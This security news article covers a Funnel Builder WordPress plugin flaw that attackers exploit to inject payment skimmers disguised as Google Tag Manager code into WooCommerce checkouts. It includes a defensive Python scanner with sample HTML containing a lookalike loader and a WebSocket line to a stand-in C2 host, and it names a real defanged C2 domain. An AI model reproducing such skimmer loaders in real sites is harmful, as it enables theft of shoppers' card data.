# Critical Vulnerability in Funnel Builder Plugin Exploited to Steal WooCommerce Payment Data
A critical security flaw in the **Funnel Builder** plugin for WordPress is under active exploitation. Attackers are leveraging the vulnerability to inject malicious JavaScript into WooCommerce checkout pages, aiming to steal sensitive payment information.

### Active Exploitation of Funnel Builder Plugin
A critical security vulnerability impacting the **Funnel Builder** plugin for WordPress has come under active exploitation in the wild to inject malicious JavaScript code into WooCommerce checkout pages. The objective is to steal payment data.
Details of the activity were published by **Sansec** this week. The vulnerability currently does not have an official **CVE** identifier. It affects all versions of the plugin before 3.15.0.3 and impacts over 40,000 WooCommerce stores.
### Unauthenticated JavaScript Injection
The flaw allows unauthenticated attackers to inject arbitrary JavaScript into every checkout page on the store, according to the Dutch e-commerce security company. **FunnelKit**, which maintains Funnel Builder, has released a patch for the vulnerability in version 3.15.0.3.
"Attackers are planting fake **Google Tag Manager** scripts into the plugin's 'External Scripts' setting," **Sansec** noted. "The injected code looks like ordinary analytics next to the store's real tags, but loads a payment skimmer that steals credit card numbers, CVVs, and billing addresses from checkout."
### Technical Details of the Vulnerability
According to **Sansec**, Funnel Builder includes a publicly exposed checkout endpoint that lets the incoming request choose which internal method is run. Older versions, however, neither checked the caller's permissions nor restricted which methods could be invoked through it.
Attackers exploit this gap by issuing an unauthenticated request that reaches an unspecified internal method. That method writes attacker-controlled data directly into the plugin's global settings, and the added code snippet is then injected into every Funnel Builder checkout page.
As a result, an attacker can plant a malicious `<script>` tag that's triggered on every checkout transaction in a susceptible WordPress site.
### Skimmer Implementation
In at least one case, **Sansec** observed a payload masquerading as a **Google Tag Manager** (GTM) loader to launch JavaScript hosted on a remote domain. It subsequently opens a WebSocket connection to the attacker's command-and-control (C2) server (`wss://protect-wss[.]com/ws`) to retrieve a skimmer that's tailored to the victim's storefront.
The ultimate goal of the attack is to siphon credit card numbers, CVVs, billing addresses, and other personal information entered by site visitors at checkout. Site owners are advised to update the Funnel Builder plugin to the latest version and review `Settings > Checkout > External Scripts` for anything unfamiliar, removing any suspicious entries.
"Dressing skimmers up as Google Analytics or Tag Manager code is a recurring Magecart pattern, since reviewers tend to skim straight past anything that looks like a familiar tracking tag," **Sansec** said.
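As an added example (not code from Sansec's report or from FunnelKit), the following Python checker scans a checkout page's HTML for the two patterns described above: a tag-manager-looking loader served from somewhere other than Google's own hosts, and any WebSocket endpoint referenced from checkout-page script. The sample HTML, the `tags.example.invalid` and `c2.example.invalid` hostnames, and the trusted-host list are constructed assumptions for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts that serve a genuine Google Tag Manager / Analytics loader (assumed allowlist).
TRUSTED_TAG_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}


class ScriptCollector(HTMLParser):
    """Collect every <script> tag as (src, inline body)."""
    def __init__(self):
        super().__init__()
        self.scripts, self._in_script, self._src, self._buf = [], False, None, []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script, self._src, self._buf = True, dict(attrs).get("src"), []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def _looks_like_tag_loader(url):
    return any(k in url.lower() for k in ("gtm", "gtag", "analytics"))


def suspicious_scripts(html, trusted_hosts=TRUSTED_TAG_HOSTS):
    """Return (reason, url) findings for scripts that mimic tag-manager code or open WebSockets."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        # External loader that names GTM/gtag/analytics but is not served from a trusted host.
        urls = [src] if src else re.findall(r"https?://[^\s'\"]+", body)
        for url in urls:
            if _looks_like_tag_loader(url) and (urlparse(url).hostname or "") not in trusted_hosts:
                findings.append(("fake-gtm-loader", url))
        # Any WebSocket endpoint wired into a checkout page deserves manual review.
        for ws in re.findall(r"wss?://[^\s'\"]+", body):
            findings.append(("websocket-endpoint", ws))
    return findings


# Constructed checkout page: one real GTM snippet, one lookalike loader, one WebSocket stub.
SAMPLE_CHECKOUT_HTML = """<html><head>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];var j=d.createElement(s);
j.src='https://www.googletagmanager.com/gtm.js?id='+i;d.head.appendChild(j);})(window,document,'script','dataLayer','GTM-XXXX');</script>
<script src="https://tags.example.invalid/gtm.js?id=GTM-XXXX"></script>
<script>var ws=new WebSocket('wss://c2.example.invalid/ws');</script>
</head><body>checkout</body></html>"""

if __name__ == "__main__":
    for reason, url in suspicious_scripts(SAMPLE_CHECKOUT_HTML):
        print(reason, url)
```

Run it against the saved HTML of a live checkout page (or the contents of the External Scripts setting) and treat every finding as a candidate for removal after confirming it is not a tag you added yourself.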
### Joomla Backdoor Campaign
The disclosure comes weeks after **Sucuri** detailed a campaign in which Joomla websites are being backdoored with heavily obfuscated PHP code. This code contacts attacker-controlled C2 servers, receives and processes instructions sent by the operators, and serves spammy content to visitors and search engines without the site owner's knowledge. The ultimate aim is to leverage the sites' reputation for injecting spam.
"The script acts as a remote loader," security researcher Puja Srivastava said. "It contacts an external server, sends information about the infected website, and waits for instructions. The response from the remote server determines what content the infected site should serve."
"This approach allows attackers to change the behavior of the compromised website at any time without modifying the local files again. The attacker can inject spam product links, redirect visitors, or display malicious pages dynamically."